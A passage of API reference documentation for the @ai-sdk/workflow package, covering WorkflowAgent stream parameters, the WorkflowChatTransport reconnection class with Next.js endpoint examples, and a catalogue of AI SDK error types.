  messages: [{ role: 'user', content: [{ type: 'text', text: 'Hello' }] }],
});

<PropertiesTable content={[ { name: 'prompt', type: 'string | Array', description: 'A prompt string or a list of messages. You can either use prompt or messages but not both.', }, { name: 'messages', type: 'Array', description: 'The conversation messages to process. You can either use prompt or messages but not both.', }, { name: 'writable', type: 'WritableStream', isOptional: true, description: 'A writable stream that receives raw model stream parts in real-time. Convert to UI message chunks at the response boundary using createModelCallToUIChunkTransform().', }, { name: 'system', type: 'string', isOptional: true, description: 'Override the system prompt for this call.', }, { name: 'stopWhen', type: 'StopCondition | StopCondition[]', isOptional: true, description: 'Condition(s) for ending the agent loop. Use isLoopFinished() to let the agent run until all tool calls have completed, but beware of potential runaway loops. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.', },

{
  name: 'toolChoice',
  type: 'ToolChoice',
  isOptional: true,
  description: "Override the tool choice strategy for this call. Default: 'auto'.",
},
{
  name: 'activeTools',
  type: 'Array<string>',
  isOptional: true,
  description: 'Limits the subset of tools available for this call.',
},
{
  name: 'output',
  type: 'OutputSpecification',
  isOptional: true,
  description:
    'Structured output specification. Use `Output.object({ schema })` for typed objects or `Output.text()` for text.',
},
{
  name: 'timeout',
  type: 'number',
  isOptional: true,
  description: 'Timeout in milliseconds. Creates an AbortSignal that aborts the operation after the given time.',
},
{
  name: 'sendFinish',
  type: 'boolean',
  isOptional: true,
  description: "Whether to send a 'finish' chunk to the writable stream when streaming completes. Default: true.",
},
{
  name: 'preventClose',
  type: 'boolean',
  isOptional: true,
  description: 'Whether to prevent the writable stream from being closed after streaming completes. Default: false.',
},
{
  name: 'includeRawChunks',
  type: 'boolean',
  isOptional: true,
  description: 'Include raw, unprocessed chunks from the provider in the stream. Default: false.',
},
{
  name: 'experimental_repairToolCall',
  type: 'ToolCallRepairFunction',
  isOptional: true,
  description: 'Callback to attempt automatic recovery when a tool call cannot be parsed.',
},
{
  name: 'experimental_transform',
  type: 'StreamTextTransform | Array<StreamTextTransform>',
  isOptional: true,
  description: 'Stream transformations applied in order. Must maintain the stream structure.',
},
{
  name: 'experimental_download',
  type: 'DownloadFunction',
  isOptional: true,
  description: 'Custom download function for fetching files/URLs.',
},
{
  name: 'telemetry',
  type: 'TelemetryOptions',
  isOptional: true,
  description: 'Per-call telemetry configuration.',
},
{
  name: 'experimental_context',
  type: 'unknown',
  isOptional: true,
  description: 'Per-call context override. Overrides the constructor default.',
},
{
  name: 'prepareStep',
  type: 'PrepareStepCallback',
  isOptional: true,
  description: 'Per-call prepareStep override.',
},
{
  name: 'experimental_onStart',
  type: 'WorkflowAgentOnStartCallback',
  isOptional: true,
  description:
    'Per-call onStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
  name: 'experimental_onStepStart',
  type: 'WorkflowAgentOnStepStartCallback',
  isOptional: true,
  description:
    'Per-call onStepStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
  name: 'experimental_onToolExecutionStart',
  type: 'WorkflowAgentonToolExecutionStartCallback',
  isOptional: true,
  description:
    'Per-call onToolExecutionStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
  name: 'experimental_onToolExecutionEnd',
  type: 'WorkflowAgentonToolExecutionEndCallback',
  isOptional: true,
  description:
    'Per-call onToolExecutionEnd callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
  name: 'onStepFinish',
  type: 'WorkflowAgentOnStepFinishCallback',
  isOptional: true,
  description:
    'Per-call onStepFinish callback. If also specified in the constructor, both fire (constructor first).',
},
{
  name: 'onFinish',
  type: 'WorkflowAgentOnFinishCallback',
  isOptional: true,
  description:
    'Per-call onFinish callback. If also specified in the constructor, both fire (constructor first).',
},
{
  name: 'onError',
  type: 'WorkflowAgentOnErrorCallback',
  isOptional: true,
  description: 'Callback invoked when an error occurs during streaming.',
},
{
  name: 'onAbort',
  type: 'WorkflowAgentOnAbortCallback',
  isOptional: true,
  description: 'Callback invoked when the operation is aborted. Receives all previously finished steps.',
},

]} />

Returns

Returns a Promise<WorkflowAgentStreamResult> with the following properties:

Utilities

`createModelCallToUIChunkTransform()`

Creates a TransformStream that converts raw ModelCallStreamPart chunks (written by the agent to the writable stream) into UIMessageChunk objects suitable for client consumption.

import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';

return createUIMessageStreamResponse({
  stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});

`toUIMessageChunk()`

Converts a single ModelCallStreamPart to a UIMessageChunk. Returns undefined for parts that don't map to UI chunks.

import { toUIMessageChunk } from '@ai-sdk/workflow';

const uiChunk = toUIMessageChunk(modelCallPart);

Types

`InferWorkflowAgentUIMessage`

Infers the UI message type for a WorkflowAgent instance. Optionally accepts a second type argument for custom message metadata.

import { WorkflowAgent, InferWorkflowAgentUIMessage } from '@ai-sdk/workflow';

const agent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
  tools: { weather: weatherTool },
});

type MyAgentUIMessage = InferWorkflowAgentUIMessage<typeof agent>;

`InferWorkflowAgentTools`

Infers the tool set type of a WorkflowAgent instance.

import { WorkflowAgent, InferWorkflowAgentTools } from '@ai-sdk/workflow';

type MyTools = InferWorkflowAgentTools<typeof myAgent>;

Examples

Basic Agent with Tools

import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';

const agent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
  instructions: 'You are a helpful assistant.',
  tools: {
    weather: tool({
      description: 'Get weather for a location',
      inputSchema: z.object({
        location: z.string(),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72,
        condition: 'sunny',
      }),
    }),
  },
});

const result = await agent.stream({
  messages: [
    { role: 'user', content: [{ type: 'text', text: 'What is the weather in NYC?' }] },
  ],
});

console.log(result.messages);
console.log(result.steps);

Agent in a Workflow with Durable Tools

import { WorkflowAgent, type ModelCallStreamPart } from '@ai-sdk/workflow';
import { convertToModelMessages, tool, type UIMessage } from 'ai';
import { getWritable } from 'workflow';
import { z } from 'zod';

// Tool execute functions marked with 'use step' become durable workflow steps
// with automatic retries and persistence
async function searchFlightsStep(input: {
  origin: string;
  destination: string;
}) {
  'use step';
  const response = await fetch(`https://api.flights.example/search?...`);
  return response.json();
}

export async function chat(messages: UIMessage[]) {
  'use workflow';

  const modelMessages = await convertToModelMessages(messages);

  const agent = new WorkflowAgent({
    model: 'anthropic/claude-sonnet-4-6',
    instructions: 'You are a flight booking assistant.',
    tools: {
      searchFlights: tool({
        description: 'Search for available flights',
        inputSchema: z.object({
          origin: z.string(),
          destination: z.string(),
        }),
        execute: searchFlightsStep,
      }),
    },
  });

  const result = await agent.stream({
    messages: modelMessages,
    writable: getWritable<ModelCallStreamPart>(),
  });

  return { messages: result.messages };
}

import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import { createUIMessageStreamResponse, type UIMessage } from 'ai';
import { start } from 'workflow/api';
import { chat } from '@/workflow/agent-chat';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const run = await start(chat, [messages]);

  return createUIMessageStreamResponse({
    stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
  });
}

Agent with Structured Output

import { WorkflowAgent, Output } from '@ai-sdk/workflow';
import { z } from 'zod';

const analysisAgent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
});

const result = await analysisAgent.stream({
  messages: [
    { role: 'user', content: [{ type: 'text', text: 'Analyze: "The product exceeded my expectations!"' }] },
  ],
  output: Output.object({
    schema: z.object({
      sentiment: z.enum(['positive', 'negative', 'neutral']),
      score: z.number(),
      summary: z.string(),
    }),
  }),
});

console.log(result.output);
// { sentiment: 'positive', score: 9, summary: '...' }

Agent with Tool Approval

import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';

const agent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
  tools: {
    bookFlight: tool({
      description: 'Book a flight',
      inputSchema: z.object({
        flightId: z.string(),
        passengerName: z.string(),
      }),
      needsApproval: true, // Pauses the agent until user approves
      execute: bookFlightStep,
    }),
  },
});

Agent with Lifecycle Callbacks

import { WorkflowAgent } from '@ai-sdk/workflow';

const agent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
  tools: { weather: weatherTool },

  // Agent-wide callbacks
  onStepFinish({ usage }) {
    console.log('Tokens used:', usage.totalTokens);
  },
});

const result = await agent.stream({
  messages,

  // Per-call callbacks (both fire)
  onStepFinish({ usage }) {
    await trackUsage(usage);
  },

  onFinish({ steps, totalUsage }) {
    console.log(`Done in ${steps.length} steps, ${totalUsage.totalTokens} tokens`);
  },
});

title: WorkflowChatTransport description: API Reference for the WorkflowChatTransport class.

`WorkflowChatTransport`

A ChatTransport implementation for useChat that enables automatic stream reconnection for workflow-based chat apps. It posts messages to a chat endpoint, extracts the x-workflow-run-id response header, and reconnects to a /{runId}/stream endpoint on interruption (network failures, page refreshes, function timeouts).

Unlike DefaultChatTransport which assumes the full response arrives in a single HTTP request, WorkflowChatTransport is designed for Vercel Workflows where the initial response stream may be interrupted by function timeouts. The transport automatically detects missing finish events and reconnects to resume from where the stream left off.

'use client';

import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';

export default function Chat() {
  const { messages, sendMessage } = useChat({
    transport: new WorkflowChatTransport({
      api: '/api/chat',
      maxConsecutiveErrors: 5,
      initialStartIndex: -50,
    }),
  });

  // ... render chat UI
}

Import

Constructor

Parameters

<PropertiesTable content={[ { name: 'api', type: 'string', isOptional: true, description: "API endpoint for chat requests. The reconnection endpoint is derived from this as {api}/{runId}/stream. Default: '/api/chat'.", }, { name: 'fetch', type: 'typeof fetch', isOptional: true, description: 'Custom fetch implementation to use for HTTP requests. Default: global fetch.', }, { name: 'maxConsecutiveErrors', type: 'number', isOptional: true, description: 'Maximum number of consecutive errors allowed during reconnection attempts before giving up. Default: 3.', }, { name: 'initialStartIndex', type: 'number', isOptional: true, description: 'Default chunk index to start from when reconnecting. Negative values read from the end of the stream (e.g., -50 fetches the last 50 chunks), useful for resuming after a page refresh without replaying the full conversation. Can be overridden per-call via reconnectToStream options. Default: 0.', }, { name: 'onChatSendMessage', type: '(response: Response, options: SendMessagesOptions) => void | Promise', isOptional: true, description: 'Callback invoked after the initial POST request succeeds. Useful for inspecting response headers (e.g., extracting workflow run ID) or tracking chat history on the client side.', }, { name: 'onChatEnd', type: '({ chatId, chunkIndex }) => void | Promise', isOptional: true, description: 'Callback invoked when the stream ends (receives a finish chunk). Receives the chat ID and total chunk count. Useful for cleanup or state updates.', }, { name: 'prepareSendMessagesRequest', type: 'PrepareSendMessagesRequest', isOptional: true, description: 'Function to customize the POST request before sending. Can override the API endpoint, headers, credentials, and body.', }, { name: 'prepareReconnectToStreamRequest', type: 'PrepareReconnectToStreamRequest', isOptional: true, description: 'Function to customize the reconnection GET request. Can override the API endpoint, headers, and credentials.', }, ]} />

Methods

`sendMessages()`

Sends messages to the chat endpoint via POST and returns a streaming response. If the stream is interrupted (no finish event received), the transport automatically reconnects via GET to {api}/{runId}/stream?startIndex={chunkIndex} to resume from where it left off.

The POST request includes the messages as JSON and expects the response to include an x-workflow-run-id header identifying the workflow run.

const stream = await transport.sendMessages({
  chatId: 'chat-123',
  trigger: 'submit-message',
  messages: [...],
  abortSignal: controller.signal,
});

Returns

Returns a Promise<ReadableStream<UIMessageChunk>> that includes chunks from both the initial POST response and any automatic reconnection.

`reconnectToStream()`

Reconnects to an existing chat stream that was previously interrupted. Useful for resuming after a page refresh or when the client needs to re-establish a connection.

const stream = await transport.reconnectToStream({
  chatId: 'chat-123',
  startIndex: -50, // Optional: fetch last 50 chunks
});

Returns

Returns a Promise<ReadableStream<UIMessageChunk> | null>.

How Reconnection Works

The transport follows this flow:

POST to {api} with messages. The response must include an x-workflow-run-id header.
Stream the SSE response, counting chunks as they arrive.
Detect interruption: If the stream closes without a finish event (e.g., function timeout, network error), the transport knows the response is incomplete.
Reconnect via GET to {api}/{runId}/stream?startIndex={chunkIndex} to resume from the last received chunk.
Retry: If the reconnection stream also interrupts, retry up to maxConsecutiveErrors times.
Complete: Once a finish event is received, call onChatEnd and close the stream.

Negative Start Index

When initialStartIndex is negative (e.g., -50), the transport sends it as-is in the first reconnection request. The server should resolve this to an absolute position and return the x-workflow-stream-tail-index response header so the transport can compute the correct position for subsequent retries.

If the header is missing or invalid, the transport falls back to replaying from the beginning (startIndex=0).

Server Requirements

For WorkflowChatTransport to work, your server must provide two endpoints:

POST `{api}` (e.g., `/api/chat`)

Accept messages as JSON body
Return an SSE stream of UIMessageChunk events
Include an x-workflow-run-id response header

GET `{api}/{runId}/stream` (e.g., `/api/chat/{runId}/stream`)

Accept a startIndex query parameter
Return the SSE stream starting from the given chunk index
For negative startIndex, resolve to the tail and include x-workflow-stream-tail-index response header

See the WorkflowAgent guide for complete endpoint examples.

Examples

Basic Usage with useChat

'use client';

import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';

export default function Chat() {
  const transport = useMemo(
    () => new WorkflowChatTransport({ api: '/api/chat' }),
    [],
  );

  const { messages, sendMessage, status } = useChat({ transport });

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <button onClick={() => sendMessage({ text: 'Hello!' })}>Send</button>
    </div>
  );
}

With Callbacks and Page Refresh Recovery

'use client';

import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';

export default function Chat() {
  const transport = useMemo(
    () =>
      new WorkflowChatTransport({
        api: '/api/chat',
        maxConsecutiveErrors: 5,
        initialStartIndex: -50, // Resume from last 50 chunks on page refresh
        onChatSendMessage: (response) => {
          const runId = response.headers.get('x-workflow-run-id');
          console.log('Workflow run started:', runId);
        },
        onChatEnd: ({ chatId, chunkIndex }) => {
          console.log(`Chat ${chatId} complete, ${chunkIndex} chunks`);
        },
      }),
    [],
  );

  const { messages, sendMessage } = useChat({ transport });

  // ... render chat UI
}

Server-Side Endpoints (Next.js)

import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import { createUIMessageStreamResponse, type UIMessage } from 'ai';
import { start } from 'workflow/api';
import { chat } from '@/workflow/agent-chat';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();
  const run = await start(chat, [messages]);

  return createUIMessageStreamResponse({
    stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
    headers: {
      'x-workflow-run-id': run.runId,
    },
  });
}

import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import type { NextRequest } from 'next/server';
import { getRun } from 'workflow/api';

export async function GET(
  request: NextRequest,
  { params }: { params: Promise<{ runId: string }> },
) {
  const { runId } = await params;
  const startIndex = Number(
    new URL(request.url).searchParams.get('startIndex') ?? '0',
  );

  const run = await getRun(runId);
  const readable = run
    .getReadable({ startIndex })
    .pipeThrough(createModelCallToUIChunkTransform());

  return new Response(readable, {
    headers: {
      'Content-Type': 'text/event-stream',
      'Cache-Control': 'no-cache',
      Connection: 'keep-alive',
      'x-workflow-run-id': runId,
    },
  });
}

title: AI SDK Workflow description: Reference documentation for @ai-sdk/workflow collapsed: true

AI SDK Workflow

@ai-sdk/workflow provides the WorkflowAgent class for building durable, resumable AI agents that run inside Vercel Workflows. It handles tool schema serialization, workflow step boundaries, and built-in tool approval flows.

title: AI_APICallError description: Learn how to fix AI_APICallError

AI_APICallError

This error occurs when an API call fails.

Properties

url: The URL of the API request that failed
requestBodyValues: The request body values sent to the API
statusCode: The HTTP status code returned by the API (optional)
responseHeaders: The response headers returned by the API (optional)
responseBody: The response body returned by the API (optional)
isRetryable: Whether the request can be retried based on the status code
data: Any additional data associated with the error (optional)
cause: The underlying error that caused the API call to fail (optional)

Checking for this Error

You can check if an error is an instance of AI_APICallError using:

import { APICallError } from 'ai';

if (APICallError.isInstance(error)) {
  // Handle the error
}

title: AI_DownloadError description: Learn how to fix AI_DownloadError

AI_DownloadError

This error occurs when a download fails.

Properties

url: The URL that failed to download
statusCode: The HTTP status code returned by the server (optional)
statusText: The HTTP status text returned by the server (optional)
cause: The underlying error that caused the download to fail (optional)
message: The error message containing details about the download failure (optional, auto-generated)

Checking for this Error

You can check if an error is an instance of AI_DownloadError using:

import { DownloadError } from 'ai';

if (DownloadError.isInstance(error)) {
  // Handle the error
}

title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError

AI_EmptyResponseBodyError

This error occurs when the server returns an empty response body.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_EmptyResponseBodyError using:

import { EmptyResponseBodyError } from 'ai';

if (EmptyResponseBodyError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError

AI_InvalidArgumentError

This error occurs when an invalid argument was provided.

Properties

parameter: The name of the parameter that is invalid
value: The invalid value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidArgumentError using:

import { InvalidArgumentError } from 'ai';

if (InvalidArgumentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError

AI_InvalidDataContentError

This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages .

Properties

content: The invalid content value
cause: The underlying error that caused this error (optional)
message: The error message describing the expected and received content types (optional, auto-generated)

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContentError using:

import { InvalidDataContentError } from 'ai';

if (InvalidDataContentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError

AI_InvalidMessageRoleError

This error occurs when an invalid message role is provided.

Properties

role: The invalid role value
message: The error message (optional, auto-generated from role)

Checking for this Error

You can check if an error is an instance of AI_InvalidMessageRoleError using:

import { InvalidMessageRoleError } from 'ai';

if (InvalidMessageRoleError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError

AI_InvalidPromptError

This error occurs when the prompt provided is invalid.

Potential Causes

UI Messages

You are passing a UIMessage[] as messages into e.g. streamText.

You need to first convert them to a ModelMessage[] using convertToModelMessages().

import { type UIMessage, generateText, convertToModelMessages } from 'ai';

const messages: UIMessage[] = [
  /* ... */
];

const result = await generateText({
  // ...
  messages: await convertToModelMessages(messages),
});

Properties

prompt: The invalid prompt value
message: The error message (required in constructor)
cause: The cause of the error (optional)

Checking for this Error

You can check if an error is an instance of AI_InvalidPromptError using:

import { InvalidPromptError } from 'ai';

if (InvalidPromptError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError

AI_InvalidResponseDataError

This error occurs when the server returns a response with invalid data content.

Properties

data: The invalid response data value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidResponseDataError using:

import { InvalidResponseDataError } from 'ai';

if (InvalidResponseDataError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolApprovalError description: Learn how to fix AI_InvalidToolApprovalError

AI_InvalidToolApprovalError

This error occurs when a tool approval response references an unknown approvalId. No matching tool-approval-request was found in the message history.

Properties

approvalId: The approval ID that was not found

Checking for this Error

You can check if an error is an instance of AI_InvalidToolApprovalError using:

import { InvalidToolApprovalError } from 'ai';

if (InvalidToolApprovalError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError

AI_InvalidToolInputError

This error occurs when invalid tool input was provided.

Properties

toolName: The name of the tool with invalid inputs
toolInput: The invalid tool inputs
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidToolInputError using:

import { InvalidToolInputError } from 'ai';

if (InvalidToolInputError.isInstance(error)) {
  // Handle the error
}

title: AI_JSONParseError description: Learn how to fix AI_JSONParseError

AI_JSONParseError

This error occurs when JSON fails to parse.

Properties

text: The text value that could not be parsed
cause: The underlying parsing error (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_JSONParseError using:

import { JSONParseError } from 'ai';

if (JSONParseError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError

AI_LoadAPIKeyError

This error occurs when API key is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadAPIKeyError using:

import { LoadAPIKeyError } from 'ai';

if (LoadAPIKeyError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError

AI_LoadSettingError

This error occurs when a setting is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadSettingError using:

import { LoadSettingError } from 'ai';

if (LoadSettingError.isInstance(error)) {
  // Handle the error
}

title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError

AI_MessageConversionError

This error occurs when message conversion fails.

Properties

originalMessage: The original message that failed conversion
message: The error message

Checking for this Error

You can check if an error is an instance of AI_MessageConversionError using:

import { MessageConversionError } from 'ai';

if (MessageConversionError.isInstance(error)) {
  // Handle the error
}

title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError

AI_NoContentGeneratedError

This error occurs when the AI provider fails to generate content.

Properties

message: The error message (optional, defaults to 'No content generated.')

Checking for this Error

You can check if an error is an instance of AI_NoContentGeneratedError using:

import { NoContentGeneratedError } from 'ai';

if (NoContentGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError

AI_NoImageGeneratedError

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message (optional, defaults to 'No image generated.').
responses: Metadata about the image model responses, including timestamp, model, and headers (optional).
cause: The cause of the error. You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoImageGeneratedError using:

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError

AI_NoObjectGeneratedError

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

Properties

message: The error message (optional, defaults to 'No object generated.').
text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode (optional).
response: Metadata about the language model response, including response id, timestamp, and model (required in constructor).
usage: Request token usage (required in constructor).
finishReason: Request finish reason. For example 'length' if model generated maximum number of tokens, this could result in a JSON parsing error (required in constructor).
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoObjectGeneratedError using:

import { generateText, NoObjectGeneratedError, Output } from 'ai';

try {
  await generateText({ model, output: Output.object({ schema }), prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
    console.log('Finish Reason:', error.finishReason);
  }
}

title: AI_NoOutputGeneratedError description: Learn how to fix AI_NoOutputGeneratedError

AI_NoOutputGeneratedError

This error is thrown when no LLM output was generated, e.g. because of errors.

Properties

message: The error message (optional, defaults to 'No output generated.')
cause: The underlying error that caused no output to be generated (optional)

Checking for this Error

You can check if an error is an instance of AI_NoOutputGeneratedError using:

import { NoOutputGeneratedError } from 'ai';

if (NoOutputGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError

AI_NoSpeechGeneratedError

This error occurs when no audio could be generated from the input.

Properties

responses: Array of speech model response metadata (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_NoSpeechGeneratedError using:

import { NoSpeechGeneratedError } from 'ai';

if (NoSpeechGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError

AI_NoSuchModelError

This error occurs when a model ID is not found.

Properties

modelId: The ID of the model that was not found
modelType: The type of model ('languageModel', 'embeddingModel', 'imageModel', 'transcriptionModel', 'speechModel', or 'rerankingModel')
message: The error message (optional, auto-generated from modelId and modelType)

Checking for this Error

You can check if an error is an instance of AI_NoSuchModelError using:

import { NoSuchModelError } from 'ai';

if (NoSuchModelError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError

AI_NoSuchProviderError

This error occurs when a provider ID is not found.

Properties

providerId: The ID of the provider that was not found
availableProviders: Array of available provider IDs
modelId: The ID of the model
modelType: The type of model
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchProviderError using:

import { NoSuchProviderError } from 'ai';

if (NoSuchProviderError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchProviderReferenceError description: Learn how to fix AI_NoSuchProviderReferenceError

AI_NoSuchProviderReferenceError

This error occurs when a provider reference cannot be resolved because the specified provider is not found in the provider reference mapping.

Properties

provider: The provider that was not found
reference: The full provider reference mapping that was searched
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchProviderReferenceError using:

import { NoSuchProviderReferenceError } from 'ai';

if (NoSuchProviderReferenceError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError

AI_NoSuchToolError

This error occurs when a model tries to call an unavailable tool.

Properties

toolName: The name of the tool that was not found
availableTools: Array of available tool names (optional)
message: The error message (optional, auto-generated from toolName and availableTools)

Checking for this Error

You can check if an error is an instance of AI_NoSuchToolError using:

import { NoSuchToolError } from 'ai';

if (NoSuchToolError.isInstance(error)) {
  // Handle the error
}

title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError

AI_NoTranscriptGeneratedError

This error occurs when no transcript could be generated from the input.

Properties

responses: Array of transcription model response metadata (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_NoTranscriptGeneratedError using:

import { NoTranscriptGeneratedError } from 'ai';

if (NoTranscriptGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoVideoGeneratedError description: Learn how to fix AI_NoVideoGeneratedError

AI_NoVideoGeneratedError

This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message (optional, defaults to 'No video generated.').
responses: Metadata about the video model responses, including timestamp, model, and headers (optional).
cause: The cause of the error. You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoVideoGeneratedError using:

import {
  experimental_generateVideo as generateVideo,
  NoVideoGeneratedError,
} from 'ai';

try {
  await generateVideo({ model, prompt });
} catch (error) {
  if (NoVideoGeneratedError.isInstance(error)) {
    console.log('NoVideoGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_RetryError description: Learn how to fix AI_RetryError

AI_RetryError

This error occurs when a retry operation fails.

Properties

reason: The reason for the retry failure
lastError: The most recent error that occurred during retries
errors: Array of all errors that occurred during retry attempts
message: The error message

Checking for this Error

You can check if an error is an instance of AI_RetryError using:

import { RetryError } from 'ai';

if (RetryError.isInstance(error)) {
  // Handle the error
}

title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError

AI_TooManyEmbeddingValuesForCallError

This error occurs when too many values are provided in a single embedding call.

Properties

provider: The AI provider name
modelId: The ID of the embedding model
maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
values: The array of values that was provided

Checking for this Error

You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:

import { TooManyEmbeddingValuesForCallError } from 'ai';

if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
  // Handle the error
}

title: AI_ToolCallNotFoundForApprovalError description: Learn how to fix AI_ToolCallNotFoundForApprovalError

AI_ToolCallNotFoundForApprovalError

Properties

toolCallId: The tool call ID that was not found
approvalId: The approval request ID

Checking for this Error

You can check if an error is an instance of AI_ToolCallNotFoundForApprovalError using:

import { ToolCallNotFoundForApprovalError } from 'ai';

if (ToolCallNotFoundForApprovalError.isInstance(error)) {
  // Handle the error
}

title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError

ToolCallRepairError

This error occurs when there is a failure while attempting to repair an invalid tool call. This typically happens when the AI attempts to fix either a NoSuchToolError or InvalidToolInputError.

Properties

originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
message: The error message
cause: The underlying error that caused the repair to fail

Checking for this Error

You can check if an error is an instance of ToolCallRepairError using:

import { ToolCallRepairError } from 'ai';

if (ToolCallRepairError.isInstance(error)) {
  // Handle the error
}

title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError

AI_TypeValidationError

This error occurs when type validation fails.

Properties

value: The value that failed validation
cause: The underlying validation error (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_TypeValidationError using:

import { TypeValidationError } from 'ai';

if (TypeValidationError.isInstance(error)) {
  // Handle the error
}

title: AI_UIMessageStreamError description: Learn how to fix AI_UIMessageStreamError

AI_UIMessageStreamError

This error occurs when a UI message stream contains invalid or out-of-sequence chunks.

Common causes:

Receiving a text-delta chunk without a preceding text-start chunk
Receiving a text-end chunk without a preceding text-start chunk
